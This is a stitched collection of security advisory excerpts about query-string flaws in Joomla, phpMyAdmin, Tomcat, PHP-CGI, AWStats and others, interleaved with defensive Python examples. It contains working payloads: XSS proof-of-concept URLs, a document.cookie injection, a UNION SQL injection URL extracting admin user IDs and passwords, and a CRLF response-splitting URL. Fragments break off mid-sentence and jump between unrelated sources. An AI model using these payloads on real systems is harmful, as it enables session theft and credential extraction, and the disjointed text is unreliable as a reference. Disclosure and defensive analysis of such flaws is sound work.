query string
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (QueryString, option, searchword) in Joomla! core
components (com_content, com_contact, com_newsfeeds, com_search) are
not properly sanitized upon submission to the /index.php URL, which
allows an attacker to conduct a cross-site scripting attack. This may
allow an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.
URL: http://target/phpmyadmin/db_search.php
Affected Parameter(s): field_str
URL: http://target/phpmyadmin/db_sql.php
Affected Parameter(s): QUERY_STRING, delimiter
URL: http://target/phpmyadmin/db_structure.php
Affected Parameter(s): sort
URL: http://target/phpmyadmin/js/messages.php
Multiple cross site scripting vulnerabilities exist within IBM's Rational ClearQuest Web interface.
VULNERABLE VARIABLES:
=====================
contextid (query string parameter)
schema (query string parameter)
userNameVal ("User Name" text box)
POC URL: http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//
3. VULNERABILITY DESCRIPTION
Plesk versions 7.0 - 8.2 contain a flaw that allows a remote cross-site
redirection attack. The flaw exists because the application does not
properly parse the query string to set it apart from the
webuser@domain.com format upon submission to the default web root URL
(/) of the affected domain (i.e. www.domain.com/). To further explain,
when a URL of the form http://domain.com/?@attacker.in is requested,
Plesk mistakenly parses domain.com/? as a web user and attacker.in as
the main domain. This allows an attacker to create a
Multiple vulnerabilities were found in SquirrelMail:
* Niels Teusink reported multiple input sanitation flaws in certain
encrypted strings in e-mail headers, related to
contrib/decrypt_headers.php, PHP_SELF and the query string (aka
QUERY_STRING) (CVE-2009-1578).
* Niels Teusink also reported that the map_yp_alias() function in
functions/imap_general.php does not filter shell metacharacters in a
username and that the original patch was incomplete (CVE-2009-1381,
Multiple vulnerabilities have been discovered and corrected in
phpmyadmin:
libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication
feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1
assigns values to arbitrary parameters referenced in the query string,
which allows remote attackers to modify the SESSION superglobal array
via a crafted request, related to a remote variable manipulation
vulnerability. (CVE-2011-2505).
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2
------------------------------------------------------------------------------------------------
URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city, f17_country,
f17_state, f17_zip, f19, wphoto, search, v, return
http://localhost/etano/search.php?'"><script>alert(/XSS/)</script>
I've found this funny result when I try to input some miscellaneous parameters in the query string.
When I try to click the HIGHLIGHTED POSTS in the blog, that entry no longer exists.
Dear Yahoo,
I've found a bug on your site: I can list all the comments and all the entries belonging to the public blog. When I try to click on a highlighted post in a blog but this entry no longer exists,
the page result is only the box for comment.
I look at the URL Address, it like this:
http://blog.360.yahoo.com/blog-(blog user encrypted ID)?cq=1&p=
I guess the string that is encrypted in the query string is the blog user's encrypted ID
Ok so now I try to input the query string parameter like this
http://blog.360.yahoo.com/blog-(blog user encrypted ID)?cq=2&p='
This attempt is stopped with the following two errors in the Web Agent log.
1. Error. No redirect target found in namespace.
2. unable to process FCC parameters. Returning SmNoAction.
SiteMinder only causes a redirect to smpwservices.fcc on certain conditions, it's not accessed directly, and it would not generate a URL with a query string that only includes SMAUTHREASON=<value>.
Or are you attempting to replace SMAUTHREASON=<value> with SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 in the query string during the normal process with something like burp proxy?
I tested that as well, and the inserted code was ignored and didn't persist to the next step during the process.
Instead of:
“/AuthNeeded/secretfile.asp”
More description:
Why IIS6 and 7 are not vulnerable:
- In these versions, IIS does not accept colon (“:”) character from the URL before the querystring.
Why we cannot use “::$Data” in IIS 5.1 anymore:
- IIS rejects the request if its URL contains “::$” (before querystring).
Why IIS5 is vulnerable to “Directory Authentication Bypass” by using “:$I30:$Index_Allocation”:
Johns Hopkins University and more (http://elgg.org/powering.php)
3. VULNERABILITY DESCRIPTION
Several parameters (page_owner, content, internalname, QUERY_STRING)
are not properly sanitized, which allows an attacker to conduct a
cross-site scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.
1. The IE user's browsing history is composed of different files
and folders. One of these files is named 'index.dat', and is usually
located at: 'C:\Documents and settings\USERNAME\Local
settings\History\History.IE5\index.dat'. Although the format of this
file is not entirely text, IE stores every visited URL, including any
parameters in the query string, in plain text.
2. Although the aforementioned folder cannot be directly browsed
using Windows Explorer or Internet Explorer, it can be browsed and
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
Details.
XOOPS is a content management system written in PHP. During an application
penetration test Sense of Security identified that input passed to the "op"
parameter of viewpmsg.php, and in the query string of user.php, is
vulnerable to cross-site scripting. This occurred as a result of the
application not properly filtering HTML tags, which allowed malicious
JavaScript to be embedded. When input is incorrectly validated, not properly
sanitised and then displayed in a web page, attackers can trick users into
viewing the web page, causing malicious code to be executed.
(4) HtmlInputRadioButton (RenderAttributes), and (5) HtmlSelect
(RenderChildren) (CVE-2008-3422).
CRLF injection vulnerability in Sys.Web in Mono 2.0 and earlier allows
remote attackers to inject arbitrary HTTP headers and conduct HTTP
response splitting attacks via CRLF sequences in the query string
(CVE-2008-3906).
The XML HMAC signature system did not correctly check certain
lengths. If an attacker sent a truncated HMAC, it could bypass
authentication, leading to potential privilege escalation
When the filter detects javascript contained in GET request arguments,
the server responds with an error 500 and a stack trace, which starts
with:
javax.servlet.ServletException: Detected JavaScript tag in
QueryString: "nodename=%3C/title%3E%3CSCRIPT%3E"; decoded:
"nodename=</title><script>"
com.hp.ov.nms.ui.framework.web.HttpContextFilter.assertNoXss(HttpContextFilter.java:282)
com.hp.ov.nms.ui.framework.web.HttpContextFilter.checkForXssAttack(HttpContextFilter.java:237)
With the PoCs above, this filter is evaded by including newline
this issue exists because of an incomplete fix for CVE-2007-3385
(CVE-2007-5333).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through
6.0.18, and possibly earlier versions normalizes the target pathname
before filtering the query string when using the RequestDispatcher
method, which allows remote attackers to bypass intended access
restrictions and conduct directory traversal attacks via .. (dot dot)
sequences and the WEB-INF directory in a Request (CVE-2008-5515).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0
V8, Google's JavaScript engine, uses a hash function which looks
different from the ones seen before, but can be broken using a meet-in-
the-middle attack, too.
Node.js uses V8 to run JavaScript-based web applications. The
querystring module parses POST data into a hash table structure.
As node.js does not limit the POST size by default (we assume this would
typically be the job of a framework), no effectiveness/efficiency
measurements were performed.
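The passage above notes that node.js itself puts no bound on the POST body, so the number of keys inserted into the hash table is attacker-controlled. The following is an added example, not code from the talk or from Node.js, of the two limits a framework would enforce before any field reaches the table: a byte cap and a field-count cap. It uses Python's urllib.parse.parse_qs, whose max_num_fields option counts separators before inserting anything; the limit values and the helper names are assumptions.

```python
from urllib.parse import parse_qs

# Assumed limits (hypothetical, not recommendations from the original text).
MAX_BODY_BYTES = 1 << 20   # 1 MiB
MAX_FIELDS = 1000


def parse_form_bounded(body, max_bytes=MAX_BODY_BYTES, max_fields=MAX_FIELDS):
    """Return (params, None) on success or (None, reason) when a limit is hit.

    parse_qs with max_num_fields counts 'name=value' fields by scanning for
    separators before it inserts a single key, so an oversized body costs one
    linear scan rather than one hash-table insert per attacker-chosen key.
    """
    if len(body) > max_bytes:
        return None, "body too large"
    try:
        params = parse_qs(body, keep_blank_values=True, max_num_fields=max_fields)
    except ValueError:
        # parse_qs raises when the field count exceeds max_num_fields.
        return None, "too many fields"
    return params, None


def many_fields_body(n):
    """Constructed body with n distinct keys. A real collision attack would pick
    keys that collide in the target's hash function; the count check above does
    not need to know that hash, it only needs the field count."""
    return "&".join(f"k{i}=x" for i in range(n))


if __name__ == "__main__":
    print(parse_form_bounded("user=alice&lang=en"))
    print(parse_form_bounded(many_fields_body(5000)))
```

The byte cap is checked first because it is the cheaper test and because a body can exceed it while containing only one field.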
In the first versions of the HP System Management Homepage (probably <= 2.1.1) there
is client-side-only input validation:
<--- cut here --->
// handle possible active content in the pieces of the query string
// (runs in the browser only; the server never sees the result of this loop)
for(i=0; i<splitquery.length; i++)
{
splitquery[i] = unescape(splitquery[i]);
// String.prototype.replace with a string pattern removes only the first,
// exact-case match of "<script>" and "</script>"
splitquery[i] = splitquery[i].replace("\<script\>", "");
splitquery[i] = splitquery[i].replace("\<\/script\>", "");
}
if(empty($arcID) && empty($urlindex)) exit();
......
// $urlindex is interpolated into the SQL text without escaping, so a single
// quote in it closes the string literal and the rest of the value runs as SQL
// (see the request below)
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
Hi all,
I have just blogged about research we recently did on HTTP Parameter
Pollution [1]. I would like to share it with you.
HPP attacks consist of injecting encoded query string delimiters into
other existing parameters. If a web application does not properly
sanitize the user input, a malicious user can compromise the logic of
the application to perform either client-side or server-side attacks.
One consequence of HPP attacks is that the attacker can potentially
override existing hard-coded HTTP parameters to modify the behavior of
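An added example of the override the post describes, written here and not taken from the post or the paper it announces. It models a hypothetical front end that forwards a user-supplied "id" to a back-end URL whose "action" parameter the front end means to fix; the host name, parameter names and both occurrence policies are assumptions, and Python's parse_qs stands in for the two parsers.

```python
from urllib.parse import parse_qs, urlencode

BACKEND = "http://backend.internal/item"  # hypothetical back-end host


def front_end_value(raw_query, name):
    """What the front end sees after its own parser runs: parse_qs already
    percent-decodes, so 'id=1%26action%3Ddelete' yields '1&action=delete'."""
    return parse_qs(raw_query, keep_blank_values=True)[name][0]


def backend_url_unsafe(item_id):
    """Vulnerable: the decoded value is concatenated as-is, so the decoded '&'
    now acts as a delimiter and the injected 'action' sits after the fixed one."""
    return f"{BACKEND}?action=view&id={item_id}"


def backend_url_safe(item_id):
    """Hardened: urlencode() re-encodes '&' and '=' inside the value, so the
    back end receives exactly two parameters."""
    return f"{BACKEND}?" + urlencode({"action": "view", "id": item_id})


def backend_params(url, policy):
    """How the back end resolves a repeated name. Frameworks differ (first
    occurrence, last occurrence, or a join); both single-value policies are
    modelled explicitly here."""
    query = url.split("?", 1)[1]
    multi = parse_qs(query, keep_blank_values=True)
    return {k: (v[0] if policy == "first" else v[-1]) for k, v in multi.items()}


def resolve(raw_query, safe, policy):
    """Run one request through front end -> URL builder -> back end parser."""
    item_id = front_end_value(raw_query, "id")
    url = backend_url_safe(item_id) if safe else backend_url_unsafe(item_id)
    return backend_params(url, policy)


if __name__ == "__main__":
    attack = "id=1%26action%3Ddelete"   # constructed request
    for safe in (False, True):
        for policy in ("first", "last"):
            print("safe" if safe else "unsafe", policy, resolve(attack, safe, policy))
```

With the unsafe builder the outcome depends on a policy the front-end developer never chose; with the safe builder the back end sees the injected delimiter only as data inside "id", whichever policy it uses.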
> thank you
> best regards
Bogus.
ABSPATH is a defined variable. You can't change its value by using a
query string.
Regards
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-1172 CVE-2012-1823 CVE-2012-2311
De Eindbazen discovered that PHP, when run with mod_cgi, will
interpret a query string as command line parameters, allowing
arbitrary code execution.
Additionally, this update fixes insufficient validation of upload
names which led to corrupted $_FILES indices.
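The advisory above says only that a query string is interpreted as command-line parameters. The CGI rule behind that (RFC 3875 section 4.4) is that a query string containing no unencoded "=" may be split on "+", percent-decoded and handed to the script as argv, which is where php-cgi's own switches such as -s and -d come from. The following is an added example, not Debian's or PHP's code, that applies that rule to constructed access-log lines to spot requests that would have reached php-cgi as options; the log lines, the IP addresses and the helper names are assumptions.

```python
import re
from urllib.parse import unquote

# Matches the request line inside a common/combined log entry.
LOG_LINE_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample log (not real traffic). Lines 2, 3 and 5 contain no
# unencoded '='; line 4 does, so its query string stays in QUERY_STRING only.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/May/2012:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/May/2012:10:00:02 +0000] "GET /index.php?-s HTTP/1.1" 200 2048',
    '10.0.0.9 - - [04/May/2012:10:00:03 +0000] "POST /index.php?-d+display_errors%3DOn HTTP/1.1" 200 128',
    '10.0.0.7 - - [04/May/2012:10:00:04 +0000] "GET /search.php?q=-s HTTP/1.1" 200 900',
    '10.0.0.7 - - [04/May/2012:10:00:05 +0000] "GET /index.php?foo+bar HTTP/1.1" 200 300',
]


def cgi_argv(query_string):
    """RFC 3875 4.4: if QUERY_STRING has no unencoded '=', the server may pass
    it to the script as command-line arguments, split on '+' and decoded.
    The '=' test must run on the raw string, before percent-decoding."""
    if "=" in query_string:
        return []
    return [unquote(part) for part in query_string.split("+") if part]


def option_like_args(query_string):
    """Argv entries php-cgi would read as its own switches (e.g. -s, -d)."""
    return [arg for arg in cgi_argv(query_string) if arg.startswith("-")]


def scan_log(lines):
    """Return (request target, option-like args) for each suspicious request."""
    hits = []
    for line in lines:
        match = LOG_LINE_RE.search(line)
        if not match or "?" not in match.group("target"):
            continue
        target = match.group("target")
        args = option_like_args(target.split("?", 1)[1])
        if args:
            hits.append((target, args))
    return hits


if __name__ == "__main__":
    for target, args in scan_log(SAMPLE_LOG):
        print(target, args)
```

Line 4 is the reason the "=" check comes before decoding: "q=-s" is an ordinary parameter and never becomes argv, while "%3D" in line 3 is only an encoded "=" and does not disable the argv path.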
Multiple security vulnerabilities have been identified and fixed
in tomcat5:
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through
6.0.18, and possibly earlier versions normalizes the target pathname
before filtering the query string when using the RequestDispatcher
method, which allows remote attackers to bypass intended access
restrictions and conduct directory traversal attacks via .. (dot dot)
sequences and the WEB-INF directory in a Request (CVE-2008-5515).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0
Problem Description:
A cross-site scripting (XSS) vulnerability was found in AWStats that
allowed remote attackers to inject arbitrary web script or HTML via
the query_string (CVE-2008-3714).
The updated packages have been patched to prevent this issue.
_______________________________________________________________________
References:
A vulnerability has been found and corrected in awstats:
awstats.pl in AWStats 6.8 and earlier does not properly remove quote
characters, which allows remote attackers to conduct cross-site
scripting (XSS) attacks via the query_string parameter. NOTE:
this issue exists because of an incomplete fix for CVE-2008-3714
(CVE-2008-5080).
This update fixes this vulnerability.
_______________________________________________________________________
Problem Description:
CRLF injection vulnerability in Sys.Web in Mono 2.0 and earlier allows
remote attackers to inject arbitrary HTTP headers and conduct HTTP
response splitting attacks via CRLF sequences in the query string.
The updated packages have been patched to fix the issue.
Update:
Details.
The Proofpoint Protection Server offers anti-spam and anti-virus,
connection management, email firewall and policy enforcement features.
A Cross-Site Scripting (XSS) vulnerability has been discovered in the
Proofpoint Protection Server where input is passed to the query string
of process.cgi. This has occurred as a result of the application not
properly filtering HTML tags, which allows malicious JavaScript to be
embedded. When input is incorrectly validated, not properly sanitised
and then displayed in a web page, attackers can trick users into viewing
the web page, causing malicious code to be executed.
Bypass using CRLF+Encodings:
---------------------------------------------
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1
XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the
filter, though the data in the query string will still be filtered.
This means that if an attacker tries to exploit a CRLF for XSS in the
casual manner, used in this demo:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>
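The Mono advisory earlier on this page and the IE8 demo URL just above both come down to one server-side pattern: an untrusted value is written into a response header, and the first CR LF pair in it ends the header line while an empty line ends the header block. The following is an added example, not code from any advisory or vendor quoted here, of that pattern beside a hardened version; the payload is constructed after the demo URL, and the redirect handler is hypothetical.

```python
from urllib.parse import quote

# Constructed after the demo URL above: the CR LF CR LF ends the headers and
# the HTML that follows becomes the response body.
PAYLOAD = ("cookie1=value1;\r\n\r\n"
           "<html><body><script>alert('get it?')</script></body></html>")


def build_redirect_unsafe(target):
    """Vulnerable pattern: the untrusted value lands unmodified in a header line."""
    return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n"


def is_safe_header_value(value):
    """A header field value may not contain CR, LF or NUL; stripping them is
    error-prone, so the hardened builder rejects the value instead."""
    return not any(ch in value for ch in "\r\n\x00")


def build_redirect_safe(target):
    """Hardened: refuse control characters, then percent-encode the remainder so
    nothing but URL characters reaches the header line."""
    if not is_safe_header_value(target):
        raise ValueError("control characters in redirect target")
    return "HTTP/1.1 302 Found\r\nLocation: " + quote(target, safe="/:?=&;%") + "\r\n\r\n"


def parse_response(raw):
    """Split a raw response the way a browser or proxy does: the first empty
    line ends the headers and everything after it is body, whatever the server
    intended. Returns (status line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


if __name__ == "__main__":
    status, headers, body = parse_response(build_redirect_unsafe(PAYLOAD))
    print(headers["location"])   # header cut short at the first CR LF
    print(body)                  # attacker's HTML is now the page body
```

This is why the IE8 filter, which inspects the query string, does not help here: the script never appears in the URL as script, it appears in the body the server itself emitted.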
It is focused on web standards, ease of use, ease of integration, and speed.
3. VULNERABILITY DESCRIPTION
The query string was not properly sanitized upon submission to the
/index.php URL, which allows an attacker to conduct a cross-site
scripting attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.
If a user has already logged in to the application, an XSS attack will
# Bug in ../dora/administartor/yonetim/patron/default.asp
<%
cookFirstLevel = Session("FirstLevelSecurity") 'First security session
cookSecondLevel = Session("SecondLevelSecurity") 'Second security session
queryProc = Request.QueryString("Proc") 'QueryString definition
strPageURL = Replace("/" & Request.ServerVariables("URL"),"//","/") 'This page's address
strFirstPass = "sifre1"
strSecondPass = "sifre2"
If fixWord(queryProc) = "" Then 'If the query is empty (normal page load)
If cookFirstLevel <> 1 and cookSecondLevel <> 1 Then 'If the 1st and 2nd level sessions both differ from 1